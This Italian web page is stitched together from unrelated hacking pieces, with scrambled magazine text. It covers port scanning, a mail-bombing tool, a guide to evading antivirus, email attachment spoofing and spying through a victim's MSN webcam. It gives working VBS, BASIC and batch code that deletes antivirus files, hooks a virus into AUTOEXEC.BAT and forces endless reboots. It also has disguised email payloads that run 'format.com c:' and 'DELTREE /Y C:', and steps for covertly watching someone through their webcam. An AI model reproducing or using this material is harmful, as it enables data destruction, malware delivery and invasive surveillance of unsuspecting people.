In ogni caso,per ogni cosa utilizziamo sempre Exploit!

Andate su:

www.milw0rm.com

www.securityreason.com

ecc per trovare VULNERABILITà,EXPLOIT e BUG!

Quindi cercate i servizi,nome di un modulo,oppure

se trovate POWERED BY...dovete tener conto di tutto

e cercare exploit che servano per un servizio ecc!

INTERNET
si basa sempre sul medesimo
concetto, ovvero quello
di interrogare quante più
porte possibili per controllare
quali di esse siano aperte e ricettive
a possibili attacchi.
Vediamo a grandi linee quali
sono i passaggi chiave per ottenere
ciò di cui necessitiamo.
>> Il dominio
Cercare una specifica rete di internet
può risultare abbastanza ostico per
l’enormità stessa delle reti contenute.
Ci viene in aiuto uno strumento semplicissimo
da utilizzare: il whois. È un
servizio Internet che, dato uno specifico
account su un dominio,
consente di recuperare molte informazioni
quali URL o utenti
collegati ad esso. InterNIC è uno
degli enti più noti per questo tipo di
applicazioni, dato che è l’organo deputato
all’attribuzione dei nomi di dominio
e degli indirizzi IP.
Dal momento che ho un dominio ed
un URL devo utilizzare un altro strumento
che mi permetta di reversare
il formato alfanumerico mnemonico
nell’indirizzo IP associato e, in un secondo
momento, controllare che effettivamente
quell’IP sia attivo quando
pianifico l’attacco. Per effettuare queste
due operazioni sfrutto un unico servizio,
noto col nome di PING. Non è
nient’altro che l’invio di una richiesta
ICMP di tipo echo a cui il computer remoto
risponde
con un pacchetto di tipo PONG, contenente,
tra le altre cose, anche l’indirizzo
IP del PC stesso.
>> Attacchi “sociali” e
attacchi scanning
Il social engineering è stato, fin dagli albori
della cultura hacker, il metodo più
utilizzato per carpire informazioni. Si
basa fondamentalmente sulle capacità
personali di rendersi credibile
nei confronti di terzi, e sfruttare
la fiducia acquisita nel tempo
per acquisire privilegi o per “rubare”
elementi utili all’attacco. Vi
sarà pur capitato di ricevere email
provenienti da account fittizi del tipo
assistenza@provider.it che vi chiedono
la password della vostra posta
elettronica per riaggiornare gli archivi!
Tipico esempio di attacco sociale in
cui l’attaccante si finge un tecnico.
Leggendo queste righe penserete che
mai nessuno cada in una trappola simile,
e invece le persone che rispondono
è di circa il 20-30%!
Gli attacchi di tipo scanning, al contra-
22 |www.hackerjournal.it
Se per assurdo voi foste degli
hacker e voleste entrare
all’interno di un sito per dimostrare
al suo amministratore,
che lo spacciava per inattaccabile,
che così in realtà non è, per prima cosa
dovreste avere ben chiaro lo scenario che
vi si presenterebbe davanti al momento
dell’attacco. Lo scenario consiste, ovviamente,
nel sistema operativo e nei servizi
utilizzati da quel determinato server dove
risiedono le pagine da attaccare.
Come riuscire quindi a raccogliere tutte
queste informazioni? Esistono, al giorno
d’oggi, un’infinità di risorse per cercare
di capire quante più notizie
possibili riguardo ai vari server.
Questo è senza dubbio il momento critico
di ogni attacco, basti pensare che report
di defacement famosi dimostravano
che spesso alle spalle di un’azione
di circa 30/60 secondi al massimo,
vi erano settimane, se non addirittura
mesi, di ricerche incessanti e
ripetute. La scansione dei punti deboli
è quindi utilizzata già da molti anni, e
prima come adesso,
S
I PRIMI PASSI DELLE PIÙ DIFFUSE TECNICHE DI ATTACCO
A CACCIA DI INDIZI
Prima di un’intrusione, l’attaccante ha bisogno
di reperire informazioni sul sistema. Cosa
spiffera in giro il vostro server?
Il NetRecon è uno degli strumenti di
scanning più completi.
Effettuando il PING di un dominio si riceve l’IP
corrispondente ed altri dati utili da acquisire.
>>
sione si risale alle porte aperte.
>> Gli strumenti del
mestiere
Sono moltissimi i programmi di tipo
scanner rintracciabili sulla rete, quasi
tutti validi e tutti comunque basati sul
medesimo principio di funzionamento.
• Nai CyberCop: funziona sia
su Linux che su Windows; valuta i punti
deboli di un sistema facendo la scansione
di esso. Riesce anche ad analizzare
problemi di sicurezza legati a server
ed hub. Integra inoltre una funzione
per cui si autoaggiorna da internet scaricando
il database dei punti deboli.
• Symante NetRecon
(http://enterprisesecurity.symantec.
com): è uno strumento operante
su Windows che analizza la rete e
scopre i suoi varchi, raggruppando i
dati raccolti in un report. Agisce simulando
vari tipi di attacchi esterni
e consigliando come “tappare”
eventuali buchi riscontrati.
•Jackal: è uno scanner Stealth
(nascosto) basato sul principio
di funzionamento di tipo SYN
TCP.
• Nmap (www.insecure.
org/nmap): scanner
molto completo che ha la
possibilità di lavorare in più
modi a seconda della situazione;
a volte usa metodologie
invisibili, a volte metodologie
rapide. Incorpora tutte le metodologie
di scanning note.
• Tiger suite (www.tigertools.
net): è considerato il miglior
strumento per la sicurezza delle comunicazioni
fra reti. La sua velocità non ha
pari con gli altri scanner ed inoltre è l’unico
che integri anche le seguenti caratteristiche:
network discovery (identifica
ed elenca tutti i punti deboli di una rete),
local analyzer (scannerizza il sistema
locale individuando tra le altre cose
anche virus, trojan e spyware), attack
tools ( set di strumenti che collaudano la
sicurezza di un sistema simulando attacchi
di varia natura).
Una volta effettuata la scansione avremo
sott’occhio una serie di porte
aperte. Sta ora alla vostra tecnica ed
alla vostra fantasia cercare di capire
come e cosa utilizzare per sfruttare al
meglio tali risorse. Nel caso che abbiate
effettuato una scansione sul vostro
server per controllarne la sicurezza,
ricordate che mai nessun computer
connesso ad internet, per sua natura,
può essere sicuro al 100%. La
vostra bravura sta quindi nel tenervi
aggiornati sulle più recenti tecniche di
protezione e nel metterle in atto cercando
così di rendere più alte possibili
le mura che circondono la vostra
“città”. K
CAT4R4TTA
cat4r4tta@hackerjournal.it
rio, sono basati su pura tecnica, o meglio,
su pura tecnologia. Si utilizzano
strumenti il cui principio di funzionamento
sta nell’inviare pacchetti su determinate
porte e vedere quali di esse
sono recettive. Esistono molte varianti di
questa tecnica; vediamone alcune:
• Scansione delle porte
TCP: si inviano dei pacchetti e si cerca
di stabilire una comunicazione con
quella determinata porta; il metodo più
semplice e il più utilizzato.
• Scansione delle porte TCP
a frammentazione: stessa tecnica
con la differenza che l’header TCP viene
diviso in pacchetti più piccoli, cosicché
i filtri di protezione non riescano ad
individuare l’attacco.
• Scansione SYN TCP: si basa
sull’invio di un pacchetto SYN come per
aprire una connessione; se il PC risponde
con una richiesta SYN/ACK il nostro
programma manda immediatamente
una risposta RST e chiude così la procedura.
Ha il vantaggio di essere quasi invisibile
e lo svantaggio di essere molto
più lenta della precedente.
• Scansione TCP FIN: tecnica
ancora più raffinata che si basa sul
principio che spesso le porte aperte
che ricevono pacchetti FIN rispondono
con pacchetti RST facendosi così individuare.
• Scansione UDP ICMP: come
sappiamo il protocollo UDP non
prevede scambio di pacchetti ACK o
RST, ma la maggior parte degli host se
riceve un pacchetto indirizzato ad una
porta UDP chiusa risponde con un messaggio
di errore; per esclu-
Si può vedere la complessità delle opzioni
che permettono scanning di vari tipi
Esempio di penetrazione utilizzando
il tool TigerSuite
www.hackerjournal.it |23
In basso si possono notere le porte
aperte e i servizi accessibili da remoto.

Guida agli attacchi Flood

Bastard Mail v1.0

, decidi il
Soggetto e il testo che vuoi inviargli come ultima cosa
scegli quande mail inviare poi clicca su invia e il lavoro
è fatto in qualunque momento puoi cliccare " vedi report "
e da li vederai in tempo reale quante mail stai inviando!
Buon divertimento ma attento a non esagerare

per scaricare clicca qui

piccola guida alla creazione dei virus

ELUDERE GLI ANTIVIRUS

I TOOLS NECESSARI

Vi servono:

- un computer
- un virus
- Blade Joiner (o un qualsiasi Joiner x WinZozz)
- Bat2Com
- ExOM



FUNZIONAMENTO DI UN ANTIVIRUS

Le tecniche utilizzate dai prodotti antivirus sono due: la ricerca euristica e il riconoscimento della firma digitale.

* Ricerca euristica
L'antivirus analizza il file (programma o documento) cercando porzioni di codice in grado di svolgere azioni insolite. Funzione tipica delle applicazioni più costose, destinate in particolare a sistemi di protezione aziendale e per grandi banche dati, è una tecnica molto complessa perché implica, da parte di chi la sviluppa, la conoscenza perfetta dei programmi e dei sistemi operativi. In pratica, si tratta di capire come può essere infettato un sistema e di conoscere i punti deboli dei programmi che possono esservi installati. A questo punto il programmatore dovrà sviluppare un software in grado di anticipare l'attività sospetta diretta ai punti deboli identificati. Il grande pregio di questa tecnica consiste nel fatto che l'antivirus è un passo in avanti rispetto ai possibili virus, è già pronto cioè prima che questi vengano creati. Il suo difetto nel numero di falsi allarmi, anche molto elevato in funzione della sensibilità e della completezza del prodotto. La maggior parte degli antivirus in commercio include anche un motore di ricerca euristica, la cui efficacia è tuttavia strettamente correlata al prezzo del prodotto: un antivirus per uso personale non offre, in genere, un sistema di rilevazione euristica particolarmente efficace.

* Riconoscimento della firma digitale
L'antivirus mette a confronto il codice dei file da controllare con quello dei virus conosciuti. Le informazioni su questi ultimi sono raccolte in un database che deve essere aggiornato a intervalli regolari e brevissimi (anche una volta al giorno). È la tecnica utilizzata dalla maggior parte dei prodotti per uso personale (in effetti, da tutti i prodotti, con un'unica eccezione). Il suo pregio è che consente di mantenere contenuto il prezzo dell'antivirus, il suo difetto è che si trova sempre un passo indietro rispetto ai virus. Perché sia efficace occorre infatti che il virus sia stato trovato e che la sua descrizione sia stata inserita nel database: solo così potrà essere riconosciuto e neutralizzato dal software. Per i programmi più diffusi, i rispettivi produttori mettono a disposizione aggiornamenti frequenti del database, anche quotidiani: è quindi necessario collegarsi al sito ed effettuare l'aggiornamento online delle informazioni, procedura che in genere non richiede più di qualche minuto.

TECNICA 1: IL JOINER

Una famosa tecnica x nascondere i virus sono i joiner. Il loro funzionamento è molto semplice: creano un file .EXE che è l'unione di due files. Uno di questi 2 files deve essere per forza un file .EXE. L'antivirus non capta il virus mescolato con un altro file perchè non risconosce la firma digitale... L'unico difetto di questa tecnica è che i files ottenuti dalla fusione sono files molto grandi, e quindi potrebbero destare sospetto. Il migliore joiner in circolazione su internet è il Blade Joiner. Questo infatti dispone di diverse funzionalità (esempio: ha la notificazione ad ICQ); uno tra i migliori è anche il Senna Spy Exe Maker. Questi due files sono scaricabili dalla SEZIONE UTILIY del sito. I files mescolati nn devono essere per forza files .EXE ma possono anche essere di diversa estensione (jpeg,bitmap...).

TECNICA 2: ELIMINAZIONE

Una tecnica molto laboriosa per eliminare il controllo dell'antivirus è eliminare l'antivirus!!! Semplicemente basta creare un file .VBS con il comando di trovare il file principale dell'antivirus e eliminarlo, quindi riavviare il computer ed eseguire il virus.
Come? Così:

TAGLIA QUI
SALVA IL FILE COME CERCA.VBS

'*********************************************

Cerca files antivirus e distruggi

'*********************************************

Dim WSHShell
Set WSHShell = WScript.CreateObject("WScript.Shell")

Dim windir,systemdir

object = "C:" ' Il drive in cui devi effettuare la ricerca

On Error Resume Next

Dim fso, f1, f2, s
Set fso = CreateObject("Scripting.FileSystemObject")
Set f2 = fso.GetFile(object & "danieletempinserisci_il.nome") 'Inserisci il nome del file
f2.Delete
'Nel caso non sappiate quale antivirus sia installato nel computer della vittima vi consiglio di inserire più nomi di files da cercare ed eliminare. Basta compiare per più volte il codice che si trova dopo il "On Error resume next" e prima di questo suggerimento.

Sub Welcome()
Dim intDoIt

intDoIt = MsgBox(L_Welcome_MsgBox_Message_Text, _
vbOKCancel + vbInformation, _
L_Welcome_MsgBox_Title_Text )
If intDoIt = vbCancel Then
WScript.Quit
End If
End Sub

TAGLIA QUI
Rinomina il file CERCA.VBS con CERCA.VBSS

A questo punto c'è il bisogno di aggiungere una stringa nel file AUTOEXEC.BAT che apra il virus dopo il riavvio del pc. In questo caso bastano poche righe di Basic:

Taglia qui...

REM *********************************************
REM *
REM * Aggiugni stringhe a file autoexec.bat
REM *
REM *
REM *
REM *
REM *
REM *********************************************
REM RINOMINA IL FILE COME CON.BAS
10 CLS
20 OPEN ("C:AUTOEXEC.BAT") FOR APPEND AS #1
30 PRINT #1, " " 'Inserisci tra le virgolette il nome del virus. Non dimenticarti del ' percorso se il file non si trova nella directory C:
40 PRINT #1,"c:windowsrundll32.exe user,exitwindows" 'Riavvia il pc all'infinito...
50 CLOSE
60 END

Taglia qui...

Dopo aver scritto il codice sorgente compila il file CON.BAS. Il risultato sarà CON.EXE. Rinomina CON.EXE COME CON.EYE

Ora manca solo un programma Smascheri(al momento giusto) ed esegua gli altri due file. Ho scelto x queste azioni un file .BAT. Il codice sorgente è il seguente:

Taglia qui...

@echo off
echo *********************************************>nul
echo * *>nul
echo * Rinomina i files, eseguili,cancellali e *>nul
echo * *>nul
echo * riavvia il pc. *>nul
echo * *>nul
echo * *>nul
echo * *>nul
echo * *>nul
echo * *>nul
echo *********************************************>nul
@echo>nul
@echo RINOMINA IL FILE SETUP.BAT>NUL
@ren CERCA.VBSS CERCA.VBS
@ren CON.EYE CON.EXE
@cerca.vbs
@con.exe
@c:windowsrundll32.exe user,exitwindows
@exit

Taglia qui...

Anche in questo caso è meglio nascondere il codice sorgente del file SETUP.BAT. Quindi apriamo il programma bat2com e scriviamo:

bat2com SETUP.BAT

Il risultato sarà un file di nome SETUP.COM

Racchiudi tutto in una cartella con il virus. Magari racchiudi il tutto con Winzip e il tuo virus è pronto x essere inviato.

TECNICA 3: ENCRYPTER

Questa è una nuova tecnica che ho sperimentato. Consiste nell'encryptare un file in modo che nn possa essere disassemblato e quindi neanche rilevato dal sistema di riconoscimento della firma digitale dell'antivirus. Il vero problema di questa tecnica, è il programma. Questo infatti è difficilmente reperibile soprattuto per i virus che solitamente funzionano sotto dos. Il programma migliore che ho trovato è stato l'ExOm. Per encryptare un file basta digitare...

exom nomefile.estensione

Nessuna di queste tecniche da SOLA garantisce un affidabilità del 100%. Vi consiglio infatti di mescolare tra loro le tecniche descritte. Come??
Esempio:
Per prima cosa encrypto il file; poi lo mescolo con un altro file con il blade joiner. In seguito creo un sistema per eliminare l'anitvirus come quello descritto nel capitolo 5.0. In questo modo avrete più possibilità di successo.

IL FILE TIPE SPOOFING

Lo spoofing dei tipi di file è una tecnica usata, spesso anche dai virus, per simulare che un certo file corrisponda ad un tipo diverso da ciò che è realmente: in questo modo si può ingannare un utente facendogli credere che un certo attachment sembri un'immagine JPG, un archivio ZIP o qualsiasi altra cosa, quando in realtà non lo è. Un primo tipo di inganno, quello delle estensioni, è molto semplice da realizzare e si basa sul fatto che Windows (95/98/ME) gestisce male le estensioni associate ai diversi tipi di files. Infatti il sistema di Microsoft è stato progettato (di default) per non visualizzare le estensioni dei tipi di files che hanno un'associazione nel registro. Ciò vuol dire che un file ARCHIVIO.ZIP viene mostrato all'interno di Esplora Risorse e degli altri programmi solo col nome ARCHIVIO, senza visualizzare la sua estensione e può essere riconosciuto dalla classica icona associata ai file di Winzip. Questa constatazione ci pone un primo interrogativo: cosa succede ad un file rinominato (volutamente) col nome ARCHIVIO.ZIP.EXE? Questo viene considerato un file di Winzip o un eseguibile? Ecco quindi in cosa consiste il primo inganno sui tipi di file: usando questo trucco della "doppia estensione" Windows riconosce il file come un .EXE (quindi lo tratta come un eseguibile) tuttavia visualizza solo il nome senza l'estensione, quindi per un utente ignaro di questo fatto, il file porterà il nome ARCHIVIO.ZIP, quando in realtà è un'applicazione .EXE. Questo trucco è stato usato da molti worm come il famigerato ZIP Explorer. Per accorgersi della frode l'unica cosa che si può fare (oltre ad usare un buon antivirus) è quella di far visualizzare a Windows le estensioni dei files, anche per quelli associati ad applicazioni. Questa opzione si può attivare da Esplora Risorse nel menu Strumenti/Opzioni Cartella o Visualizza/Opzioni Cartella. In questo modo un'e-mail che porta dietro una attachment, visualizza il file allegato col suo nome reale, mostrando magari che questo in realtà è un eseguibile.

IL MIME NELLE E-MAIL

Un secondo modo di realizzare lo spoofing dei tipi di files è invece molto più subdolo e meno facile da intercettare: si tratta dell'uso di intestazioni malformate nel protocollo MIME che gestisce gli allegati alle e-mail. Gli attachment in un messaggio di posta elettronica vengono codificati usando lo standard MIME con una codifica di solo testo nel caso dei file ASCII puri (TXT, BAT, HTA) oppure con la codifica "base64" nel caso si tratti di file binari (eseguibili, immagini, file ZIP). Ecco un esempio di come vengono codificati (in forma di attachment) un file di immagine (PAMELA.GIF) e un file eseguibile (COMMAND.COM). La sezione evidenziata (box 1) nelle due definizioni di attachment è quella che definisce il tipo di files allegato e quindi anche l'applicazione da eseguire e l'associazione che deve realizzare Windows per quel file. L'inganno consiste proprio nel cambiare il campo "Content-Type" indicando magari che un file eseguibile è un'immagine. Windows (quindi Outlook Express) andrà ad associare a quel file l'icona corrispondente a ciò che indichiamo dentro la definizione MIME, quindi un attachment che magari è un programma porterà l'icona associate ai file GIF. Proviamo allora a creare una e-mail con un allegato "camuffato": scriviamo un file di testo come quello riportato e salviamolo poi con l'estensione .EML (per renderlo una e-mail leggibile da Outlook);


MIME-Version: 1.0
From: mittente@server.com
To: destinatario@server.com
Subject: bla bla bla
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit
<script>var wsh=new ActiveXObject('WScript.Shell');
wsh.Run('format.com c:');</script>


Il file allegato è un'applicazione di tipo HTA, quindi eseguibile, tuttavia se andiamo ad aprire l'e-mail essa riporta un allegato con l'icona di un'immagine GIF proprio perche nel "Content - Type" abbiamo specificato un tipo di file diverso. l'exploit ancora non è ancora completo, perché se ora proviamo ad aprire il file allegato, questo viene associato al visualizzatore di immagini GIF di Windows e non viene più considerato un eseguibile, quindi pur volendo non potrebbe causare alcun danno. Cosa è successo? Cambiando il "Content - Type" abbiamo modificato radicalmente il tipo di file, che ora viene associato ad un'altra applicazione e quindi non è più eseguibile. Come oltrepassare questa limitazione? E' qui che viene sfruttato un bug del MIME che consiste nel creare un "Subject" dell'e-maillungo 255 caratteri (ne uno di più, ne uno di meno!) seguito dall'estensione che vogliamo dare al file (nel caso di prima quindi ".HTA"). Se mettessimo un solo carattere in meno dei 255 previsti, l'allegato verrebbe riconosciuto come un'immagine GIF; se invece mettessimo un carattere in più l'allegato perderebbe ogni tipo di estensione e non sarebbe riconosciuto da Windows ne associato a qualche applicazione. Ecco quindi come modificare l'e-mail per realizzare il filetype spoofing;


From: mittente@server.com
To: destinatario@server.com
Subject: PAMELA.GIF + [245 spazi vuoti] + .HTA
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit
<script>var wsh=new ActiveXObject('WScript.Shell');
wsh.Run('format.com c:');</script>


L'essenziale è inserire nel " Subject" 255 caratteri ASCll: volendo si può scrivere anche un nome fasullo per il file (PAMELA.GIF) e completare poi i caratteri che mancano con degli spazi vuoti fino ad arrivare a 255 (nel nostro caso quindi servono 245 spazi perché "PAMELA.GIF" è lungo 10 caratteri) e infine scrivere la vera estensione da assegnare al file allegato (.HTA). Il tutto ovviamente va scritto su un'unica riga;
Ecco un altro esempio che utilizza lo spoofing di un file BAT, che virtualmente può eseguire qualsiasi comando sul sistema:


From: mittente@server.com
To: destinatario@server.com
Subject: PAMELA.GIF + [245 spazi vuoti] + .BAT
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit
DELTREE /Y C:


Content-Type: image/gif; name="PAMELA.GIF"
Content-Transfer-Encoding: base64

oaMk7W8HR28u0yAIB2OfcimXz5UmiMuV025P83
.......(parte codificata in base64)

Content-Type: application/actet-stream; name="COMMAND.COM"
Content-Transfer-Encoding: base64

TVogALsAAAC4BAAA//8AAAAAAAAAA
.......(parte codificata in base64)

ESEMPIO DI CODIFICA DEGLI ALLEGATI

Come ci difende Windows da questi attachment pericolosi? E' vero che la falla di sicurezza può rendere ingannevoli i files e confondere gli utenti, tuttavia Windows si accorge dell'inghippo e quando l'utente clicca per aprire l'allegato, Outlook mostra un minimo di avviso, anche se però non viene menzionato il fatto che l'allegato non è un'immagine e all'interno dello stesso avviso il file viene nominato col nome fasullo, non con quello reale, proprio per il fatto che sono stati usati 255 caratteri.


COSA SONO I TROJAN HORSE

Il Trojan Horse (Cavallo di Troia) è un programma che, con funzioni non autorizzate, si nasconde dentro un programma autorizzato. Un trojan ha diverse funzioni... ad esempio può mandarti tutte le password che vengono digitate in un giorno al tuo indirizzo di posta elettronica e contemporaneamente può cancellarsi da solo.
Se non è intenzionale ( ovvero non viene immesso nel sistema da un hacker ) questo viene chiamato bug ( cito una storia che avevo letto su alcune guide..."per chi non sapesse perchè viene usato il termine bug per indicare un errore in un sistema, deve sapere che quando avevano inventato il primo computer, che era grande come una stanza, tra i suoi circuiti un giorno si infilò una cimice che lo mandò fuori uso e da allora i difetti di un sistema vengono chiamati bug cioè insetto..." ).
Alcuni anti-virus individuano alcuni trojan ma come nel caso dei virus, nessuno può sentirsi al sicuro poichè per ogni nuova scoperta in campo di protezione ne viene fatta una nel campo dell'attacco.

COME DIFENDERSI E RIPULIRE IL PROPRIO PC

I trojan sono file "visibili" (quindi non sono dei veri e propri virus) che si avviano automaticamente ogni volta che viene avviato il computer. Quindi per verificare se il proprio Pc non sia infetto da trojan, quali Netbus, BackOrifice e Paradise si possono "eseguire" due metodi:
Verificare, mediante SysEdit e Regedit, se vengono eseguiti automaticamente stringhe, file o programmi "sconosciuti". (scelta + consigliata anche se più rischiosa...).
Chiedere ad un vostro AMICO di provare a connettersi al vostro pc mediante netbus... Se lui non riesce a connettersi con nessun programma allora significa che siete salvi (solo però dai programmi da lui utilizzati...). Nel caso in cui riesca a connettersi con uno dei programmi siete nella... M***A!!! In questo caso per disinfettarvi o utilizzate programmi appositi (gli anti-virus aggiornati mensilmente riconoscono quasi sempre i trojan, oppure gli anti-trojan) o per essere sicuri al 100% fate tutto voi mediante l'utilizzo di SysEdit e Regedit.
Utilizzo di Regedit e SysEdit
SysEdit e Regedit sono due programmi che si trovano rispettivamente nella directory c:windowssystem e c:windows.

SysEdit: avviare il programma e verificare che il file Autoexec.bat e Win.ini non eseguano automaticamente stringhe, file o programmi "sconosciuti". In questo caso cancellare la/e stringa e riavviare il computer e se tutto funziona (prova ad avviare anche alcuni programmi) correttamente potresti aver eliminato l'intruso.

Regedit: avviare il programma e verificare se nella stringa Run (precisamente in: (HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrenteVersionRun) vengano richiamate applicazioni "sconosciute" (i più comuni sono nuke.exe e fast.exe). In questo caso cancellare la/e stringa e riavviare il computer e se tutto funziona (prova ad avviare anche alcuni programmi) correttamente potresti aver eliminato l'intruso.

N.B. Prima di fare modifiche decisive con SysEdir e Regedit SALVA i file da modificare; molte volte quello che ritieni estraneo, sono stringhe necessarie per l'avvio corretto del proprio computer quindi...

clicca qui sotto per eseguire il download

clicca qui sotto per eseguire il download

cliccca qui sotto per eseguire il download

OGGI VI SPIEGO COME SPIARE UN CONTATTO MSN

UTILIZZANDO LA SUA WEBCAM

TUTTO QUESTO CON UN SEMPLICE SCRIPT

PREMESSA:

Lo Scopo Dello Script è solamente infomativo e non mi assumo responsabilità dell'uso che ne fate!

ELEMENTI NECESSARI:

Windows Live Messanger Installato (Versione Recente)
Messanger Plus Installato Nel Tuo e Nel Pc Della Vittima
Sistema Operativo Windows Xp/Vista


PRIMA DI TUTTO INVIAMO ALLA VITTIMA LO SCRIPT

IO L'HO CHIAMATO "giochifree" PER FAR SEMBRARE IL TUTTO PIU REALISTICO

1 INVIATELO ALLA VITTIMA

2 FATELO IMPORTATE E ATTENDETE IL RIAVVIO DI MSN

3 MANDATEGLI UN QUALSIASI MESSAGGIO

4 ATTENDETE 10 SECONDI

5 ORA INVIATELI QUESTO COMANDO: vdwcio

6 ORA VI INVIERA LA RICHIESTA DI VISUALIZZARE LA WEBCAM ACCETTATELA

7 ATTENDETE LA CONNESSIONE CON LA WEBCAM DELLA VITTIMA E INIZIATE A SPIARE

8 QUANDO AVETE "FINITO" MANDATE IL COMANDO: vdwcso
PER CHIUDERE LA CHAT!

Enjoy!

clicca qui sotto per eseguire il download

clicca qui sotto per eseguire il download